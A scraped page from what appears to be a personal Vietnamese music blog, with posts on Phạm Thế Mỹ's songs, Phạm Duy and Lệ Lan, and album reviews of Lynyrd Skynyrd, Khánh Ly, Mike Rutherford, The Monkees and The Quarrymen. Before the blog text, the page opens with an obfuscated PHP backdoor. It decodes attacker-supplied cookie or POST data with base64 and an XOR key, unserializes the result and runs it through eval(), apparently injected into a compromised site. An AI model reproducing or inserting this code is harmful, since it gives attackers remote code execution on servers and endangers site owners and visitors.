$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Music – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Music (page 1 of 18)

Trăng tàn trên hè phố & Những ngày xưa thân ái

Hãy nói qua về Phạm Thế Mỹ.

Phạm Thế Mỹ là một trường hợp đặc biệt hiếm hoi trong làng âm nhạc Việt Nam, cả trước và sau 1975. Ông là nhạc sĩ Việt-cộng, nhưng những bài nhạc của ông được các ca sĩ lính-quốc-gia hát nhiều đến mức, nếu không thật sự tìm hiểu kĩ, những bài nhạc đó rất dễ bị lầm tưởng là viết cho Việt Nam Cộng Hoà. Dẫn đến việc, có một số bài của ông rất nổi tiếng được cấp phép chính thức và được hát khắp nơi: “Bông hồng cài áo”, “Hoa vẫn nở trên đường quê hương”…, lại có những bài đến giờ vẫn chưa được cấp phép hát, như: “Trăng tàn trên hè phố”” và “Những ngày xưa thân ái”.

Cả 2 bài “Trăng tàn trên hè phố” và “Những ngày xưa thân ái” xứng được liệt vào danh sách những bài nhạc vàng hay nhất ở miền Nam trước năm 1975. Rất nhiều ca sĩ thành danh ở miền Nam ngày đó, và hải ngoại hiện tại, vẫn trình bày 2 ca khúc này của ông: Duy Khánh, Giang Tử, Tuấn Vũ, sau thì có Băng Tâm, Đan Nguyên, Trường Vũ, Như Quỳnh…

Bài “Trăng tàn trên hè phố” có những câu rất đẹp, mà ắt phải có một tâm hồn tinh tế, yêu quê hương, xúc động với thời cuộc, tác giả mới viết ra được

Lối gầy về nhà anh hoa phượng thắm
Màu xanh áo người thương
Nắng chiều đẹp quê hương
Hay nhạc buồn đêm sương

hay

Ánh trăng khuya sắp tàn trên hè phố
Thôi mình chia tay
Rồi mai đây có về
Quà cho tôi anh nhớ chép bài thơ

Nhưng ở note này, hãy nói chủ yếu về bài “Những ngày xưa thân ái”. Bài này, theo mình, phải nghe Duy Khánh hát mới thấm được thấy cái đẹp và buồn đến tê tái của cảnh chiến tranh bão lửa, những gì còn hoài vọng về, ắt chỉ có kỉ niệm đẹp của những ngày xa xưa êm đềm, đầy thân ái. Đặc biệt, câu

Nghe tin anh gục ngã dừng chân quán năm xưa
Uống nước dừa hay nước mắt quê hương

mỗi lần nghe, đều khiến lòng mình trùng xuống.

Điều đặc biệt, “Những ngày xưa thân ái” nguyên bản là một bài thơ của người anh ruột nhạc sĩ – nhà thơ Phạm Hổ, khi đó đã tập kết ra Bắc. Sau khi Phạm Hổ sáng tác bài thơ đó, thì ở miền Nam, Phạm Thế Mỹ cũng cho ra mắt bài nhạc cùng tên, nhưng ca từ nhân văn và dạt dào tình cảm hơn nhiều, dù nội dung chính đều là về “những ngày xưa”. Thôi, nói tới đây thôi, nói dài quá lại lan man qua chính trị…

Lời bài thơ của Phạm Hổ:

Tôi bắn hắn rồi
Những ngày xưa thân ái
Không ngăn nổi tay tôi
Những ngày xưa thân ái
Chắc hắn quên rồi
Riêng tôi, tôi nhớ:
Đồng làng mênh mông biển lúa
Sương mai đáp trắng cỏ đường
Hai đứa tôi,
Sách vở cặp chung
Áo quần nhàu giấc ngủ
Song song bước nhỏ chân trần
Gói cơm mo mẹ vắt xách tùng tơn
Nón rộng hỏng quai
Trong túi hộp diêm nhốt dế
Những ngày xưa êm đẹp thế
Không đem chung hai đứa một ngày mai
Hắn bỏ làng theo giặc mấy năm nay
Tôi buồn tôi giận,
Đêm nay gặp hắn,
Tôi bắn hắn rồi
Những ngày xưa thân ái
Không ngăn nổi tay tôi
Xác hắn nằm bờ ruộng
Không phải hắn thuở xưa
Tôi cúi nhìn mặt hắn
Tiếc hắn thời ấu thơ.

Lời bài nhạc cùng tên của Phạm Thế Mỹ:

Những ngày xưa thân ái anh gởi lại cho ai
Gió mùa xuân êm đưa rung hàng cây lưa thưa
Anh cùng tôi bước nhỏ áo quần nhăn giấc ngủ
Đi tìm chim sáo nở ôi bây giờ anh còn nhớ ?

Những ngày xưa thân ái xin gởi lại cho ai
Trăng mùa thu lên cao khóm dừa xanh lao xao
Anh cùng tôi trốn ngủ ra ngồi hiên lá đổ
Trong bầy chim trắng hiền mơ một nàng tiên dịu hiền

Đêm đêm nằm nghe súng nổ giữa rừng khuya thác đổ, anh còn nhắc tên tôi ?
Đêm đêm nhìn trăng sáng tỏ bên đồi hoa trắng nở, cuộc đời anh có vui ?
Thời gian qua mau tìm anh nơi đâu
Tôi về qua xóm nhỏ con đò nay đã già
Nghe tin anh gục ngã
Dừng chân quán năm xưa
Uống nước dừa hay nước mắt quê hương

Những đường xưa phố cũ thôi nỡ đành quên sao
Xin gọi lại tên anh giữa trời sao long lanh
Anh giờ yên giấc ngủ tôi nằm nghe súng nổ
Như lời anh nhắc nhở ôi câm hờn dâng ngập lối
Những ngày xưa thân ái xin buộc vào tương lai
Anh còn gì cho tôi tôi còn gì cho em
Chỉ còn tay súng nhỏ giữa rừng sâu giết thù
Những ngày xưa thân ái xin gởi lại cho em

Note thêm dù chẳng liên quan, là bài “Áo Lụa Vàng”, rất nổi tiếng qua tiếng hát Khánh Ly

Ngày mai em đến, xin mặc áo lụa vàng, nghe em hãy nhớ.
Quê hương anh đó, đang cần đến tình người, đang cần đến nụ cười
Cho tâm hồn nghỉ ngơi

cũng là một bài đầy nhân văn, được nhạc sỹ Phạm Thế Mỹ sáng tác để tặng Hà Thanh, vì có một lần, khi đến thăm ông trên giường bệnh, Hà Thanh mặc trên người một chiếc áo lụa vàng.

p/s: bài Trăng tàn trên hè phố, mình đặc biệt thích version Phương Diễm Hạnh trình bày ở Paris By Night [embedyt] http://www.youtube.com/watch?v=lQtAFSoKf30[/embedyt]

Chỉ chừng đó thôi

Ngày đó Phạm Duy yêu Helene, một cô gái ngoại quốc. Helene sống ở Sài Gòn cùng con gái mình là Alice. Ngày xưa khi còn quen biết và tới nhà Helene, Alice còn bé xíu, thế mà bẵng đi vài chục năm sau gặp lại, Alice đã trở thành một thiếu nữ xinh đẹp. Phạm Duy và Alice phải lòng nhau.

Phạm Duy ngày đó chả vừa, là một người đam mê nhục dục xác thịt (điều này chính ông thừa nhận), nhưng mối tình với Alice là mối tình ông gọi là “mối tình đồng trinh duy nhất” – cả hai chỉ yêu nhau qua tâm hồn, không có bất cứ liên hệ gì về thể xác. Đây có thể xem là một trong những mối tình thơ nhạc đẹp nhất của nền văn học nghệ thuật miền Nam trước giải phóng. Trong rất nhiều bài nhạc của mình, Phạm Duy đều có đề tặng Lệ Lan, sau này mọi người mới biết đó là tên Việt của Alice. Alice cũng viết tặng Phạm Duy tới gần 300 bài thơ, rất nhiều trong đó được ông phổ nhạc.

Trước khi đi lấy chồng, Lệ Lan đã gửi cho nhạc sỹ Phạm Duy một bức thư. Trong đó bà viết: “Mười năm, quá đủ cho một mối tình đẹp và một đời người ngắn ngủi…(…)…Từ đây đến ngày cưới có thể L. sẽ xin gặp chú một, hai lần nữa. Chẳng để làm gì cả. L. chắc chú cũng nghĩ như L. Chẳng có gì bi thảm. Chẳng có gì tiếc hận. Một mối tình đẹp kết thúc một cách êm ái. L. chỉ xin giữ lại một chút dư hương để truyền lại cho các con của L. sau này cho chúng nó cũng có một tâm hồn biết yêu thương đằm thắm”.

Như Phạm Duy sau này về già hồi tưởng, thì có tới hơn 40 bài nhạc của ông lấy Lệ Lan làm cảm hứng, trong đó tiêu biểu nhất là 3 bài:
– Ngày ấy chúng mình – đánh dấu thời điểm yêu nhau
– Nghìn trùng xa cách – đánh dấu thời điểm xa nhau
– Chỉ chừng ấy thôi – đánh dấu thời điểm ông quyết định quên Lệ Lan

—————–

À, sẵn tiện đang nghe “Chỉ Chừng Ấy Thôi” nên viết,

Chỉ cần một cơn mưa
Là vai gầy thêm nữa
Cho ướt môi, mềm da
Chỉ cần giọt mưa sa

Chỉ chờ một cơn mưa
Để không ngờ chi nữa
Đi dưới mưa hồng nghe
Giọt nhẹ vào tim ta.

For M, M sống tốt nhé.

Lynyrd Skynyrd – First And Last…

First And Last là album được phát hành ngay sau tai nạn máy bay thảm khốc đã góp phần làm tan rã ban nhạc được xem như là một trong những tên tuổi lớn nhất của dòng nhạc rock miền Nam (southern rock): Lynyrd Skynyrd. Những bài trong album này là một trong những bài đầu tiên mà Lynyrd Skynyrd đã chơi, nhưng vì nhiều lí do không được chọn đưa vào album (Pronounced ‘Lĕh-‘nérd ‘Skin-‘nérd) của họ.

Nhìn chung album này không phải là album xuất sắc nhất của Lynyrd Skynyrd, nhưng là album nên có nếu bạn là fan ruột của nhóm, hay đơn thuần chỉ mê cái thứ nhạc đầy mịt mờ bụi bặm của các xứ sở phương Nam đầy phóng khoáng.

Hãy nói đặc biệt về “Was I Right Or Wrong” – một bài hát mà theo mình, có thể sánh ngang với những bản nhạc tuyệt vời nhất viết về miền Nam như “Sweet Home Alabama” hay “Free Bird” của nhóm. Cũng đã lâu rồi, mình mới nghe lại được một bản nhạc đúng nghĩa Southern Rock như thế. Người ta nói, lời nhạc của Van Zant như viết về câu chuyện ‘kinh điển’ của các thanh niên miền Nam ngày đó: bất đồng với gia đình, bỏ nhà đi lang bạt mong một ngày nở mày nở mặt hồi hương,

Papa used to always say I was a useless fool
So I left my home to show ’em they was wrong

để rồi khi quay trở lại, đón tiếp anh không phải là nụ cười của mẹ, niềm tự hào của cha, mà là hai tấm mộ bia

When I went home to show ’em they was wrong
All that I found was two tombstones

và rồi cứ sống trong nỗi băn khoan là mình đúng hay sai

Somebody tell me, please, was I right or wrong?

Bài nhạc buồn, và hay đến mức, nghe xong cả album chỉ còn nó đọng mãi.

Khánh Ly – Lullaby of Đà Nẵng

“Lullaby Of Đà Nẵng” là tên đĩa nhạc được Khánh Ly thu vào năm 1987 tại Nhật với hãng đĩa Nippon Columbia rất lớn thời điểm đó. Đây cũng là bài hát chủ đề trong bộ phim “Thuyền Nhân” do Nhật Bản – Hồng Kông sản xuất từng gây tiếng vang không nhỏ.

Mình nghe Khánh Ly, chắc là nhiều lắm, nhưng chưa bao giờ nghe tới bài này, cho tới khi tìm được và vất vả đấu giá thắng đĩa trên eBay. Trong khoảng thời gian chờ đĩa ship từ Nhật qua, mình luôn có thắc mắc là “Lullaby of Đà Nẵng” dịch là “Lời ru của Đà Nẵng” (dành cho những người con đã bỏ ra đi), hay là “Lời ru cho Đà Nẵng” (lời của những người con dành cho đất mẹ mình đã bỏ lại). Mình nghĩ là cho.

Câu chuyện “thuyền nhân” là những câu chuyện dài và rất khó kể hết. Những lần hội họp gia đình, đa phần mình đều được nghe các cậu, các dì, hay là cả mẹ mình kể về những ngày trở thành thuyền-nhân đó. Những câu chuyện đôi khi xen chút bông đùa, tưởng như nhẹ nhàng, nhưng sức nặng và dấu ấn mà nó để lại, với đời mẹ mình chưa phai, và tới mình, dù không trải qua cũng lại hằn in không bớt.

Tối nay, khi đĩa về, tự mình pha cho mình một li Tequila (mình rất hiếm uống một mình), chui vào phòng, tắt đèn và bỏ đĩa vào mâm. Ngay khi tiếng cô Khánh Ly vang lên từ những giây đầu bài, tim mình đã trĩu nặng, li rượu trên tay đột nhiên thành đắng nghét. Cũng không ngờ, một bài nhạc trong thời điểm này lại khiến mình xúc động nhiều như thế

Nước mắt rơi xuống thân phận người
Khóc giấc mơ đã tan tành rồi
Em yêu hỡi! xa muôn đời
Còn đâu nữa quê hương tuyệt vời…

Khi Khánh Ly kết thúc bài hát bằng 4 câu đó, mình nhìn ra ngoài bầu trời đêm đen thăm thẳm thấy nhớ, nhớ tất cả mọi thứ ở Việt Nam, nhớ gì đâu…

p/s: đĩa còn rất mới, cả 2 bài đều là nhạc của Hako Yamasaki. Bài mặt 1 là “Lullaby of Đà Nẵng”, lời do Nguyễn Hoàng Đoan – chồng cũ Khánh Ly soạn. Bài mặt 2 là “Sao hôm nay”. Điều lạ là khi chơi đĩa ở tốc độ 45 vòng thì là tiếng hát Khánh Ly, khi để đĩa sang chế độ chơi bình thường 33 vòng thì là tiếng của một ca sĩ nam nào đó…

Mike Rutherford ‎– Smallcreep’s Day

Smallcreep’s Day là album solo đầu tiên của Mike Rutherford – tay bass của ban nhạc rock Anh quốc Genesis lừng danh. Album nhận được sự đón nhận khá trái chiều của thính giả nghe nhạc. Đa phần những fan hâm mộ gạo cội của Genesis thì mong chờ ở Mike một thứ nhạc rock đúng-chất-Genesis khi nào, nhất là khi Mike có sự giúp sức của Anthony Phillips (guitar chính trong Genesis), được sản xuất bởi David Hentschel (mà cùng năm giúp sản xuất một trong những đĩa hay nhất của Genesis – Duke). Tuy nhiên, một lượng fan hâm mộ khác thì hài lòng với những gì mà Mike tạo ra trong album này, dù nó khá khác lạ.

Chất nhạc trong album khá hay, ít nhất là đối với mình, vì mình luôn có chút yêu thích cá nhân dành cho thể loại progressive rock. Concept của album cũng khá lạ với ca khúc cũng là tựa album, bao gồm 7 ca khúc nhỏ, chiếm cả một mặt của record.

Dù Smallcreep’s Day không phải là thứ thành công nhất mà Mike Rutherford có ‘ngoài’ Genesis, nhưng nó tạo tiền đề cho ông và ban The Mechanics sau này…

Mình nghĩ album này được 4/5 điểm.

The Monkees ‎– Pisces, Aquarius, Capricorn & Jones Ltd.

Pisces, Aquarius, Capricorn & Jones Ltd. không những chỉ được xem là album hay nhất của The Monkees (ừm, nhiều người nghĩ album Headquarters trước đó của họ hay hơn, tuỳ người vậy), mà còn là một trong những album có-liên-quan-đến-rock tiêu biểu nhất của thập niên 60, sánh vai với Pet Sounds của Beach Boys, Highway 61 Revisited của Bob Dylan, Revolver của The Beatles hay Beggars Banquet của The Rolling Stones… 

Album giống Revolver ở chỗ hầu như bài nào cũng hay, và mỗi bài có một style khác nhau. The Monkees không bị gò bó bởi yêu cầu của hãng đĩa, bắt đầu bộc lộ tài năng chơi nhạc của mình. Các thành viên trong ban nhạc đều thăng hoa, nhưng đặc biệt nhất vẫn là Mike Nesmith, linh hồn của nhóm, với chất giọng cao và làn hơi kéo dài trong ca khúc mang âm hưởng nhạc đồng quê What Am I Doin’ Hanging Round?, The Door Into Summer (chịu ảnh hưởng từ cuốn tiểu thuyết cùng tên của Robert A. Heinlein), Love Is Only Sleeping đầy mạnh mẽ và lời nhạc hoàn hảo khó chê.

Một album tuyệt hảo, xứng đáng có mặt trong bộ sưu tập của bất cứ tay mê nhạc nào.

tản mạn về The Quarrymen ‎– That’ll Be The Day, một trong những đĩa hiếm nhất

Đây chắc là một trong những đĩa hiếm nhất từng tồn tại, mà thính giả mê nhạc dù có hứng thú đến đâu cũng không thể nào mua được. Vì đây là bản thu âm duy nhất của The Quarrymen, tiền thân của The Beatles huyền thoại, hiện thuộc sở hữu của Sir Paul McCartney.

Câu chuyện bắt đầu vào năm 1956, khi một nhóm những học sinh trung học phổ thông ở trường Quarry Bank (Liverpool) quyết định thành lập ban nhạc với tên The Quarrymen. Thành viên đầu tiên của ban nhạc, không ai khác chính là John Lennon, sau đó có thêm Paul McCartney, George Harrison, Colin Hanton (trống) và John Duff Lowe (piano).

Nhóm các bạn trẻ có những bài học nhạc đầu tiên từ mẹ của John, bà Julia Lennon, ban đầu chủ yếu chỉ đánh đàn banjo. Sau nhóm quyết định chơi thứ nhạc có tên là skiffle – vốn kết hợp jazz, blue, folk và root lại.

Vào ngày 12 tháng 7 năm 1958, nhóm nhạc khi này bắt đầu cảm thấy đủ tự tin và đã đủ tiền tiết kiệm để ghi âm đĩa đầu tiên của mình. Họ tới studio tư gia Phillips’ Sound Recording Services trong cùng thành phố để ghi âm. Giá phải trả, qui ra mệnh giá hiện tại là khoảng 22 đô, chia đều cho 5 người.

Họ ghi âm trên đĩa nhựa 78 vòng, mỗi mặt 1 bài hát. Mặt A đó là “That’ll be the day” của Buddy Holly và Jerry Allison phát hành một năm trước đó. Mặt B là ca khúc đầu tiên các thành viên trong nhóm sáng tác: “In Spite of All the Danger” viết bởi McCartney và Harrison. Theo McCartney kể lại, thì ca khúc này chịu ảnh hướng rất lờn từ Elvis Presley.

Sau khi ra đĩa duy nhất này, mỗi thành viên giữ đĩa trong một tuần, sau đó cho bạn bè mượn. Đĩa thất lạc cho tới năm 1981 khi Lowe quyết định đem nhượng lại nó cho McCartney với số tiền không được công bố.

Hiện McCartney là chủ sở hữu đĩa duy nhất này. Và đĩa này cũng là đĩa hiếm hoi mà không-được-phép-rao-bán trên trang bán đĩa vinyl lớn nhất cõi Internet: discogs, vì theo lời admin: người duy nhất có thể bán đĩa này là McCartney, và tôi không bao giờ nghĩ ông ấy sẽ bán nó.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.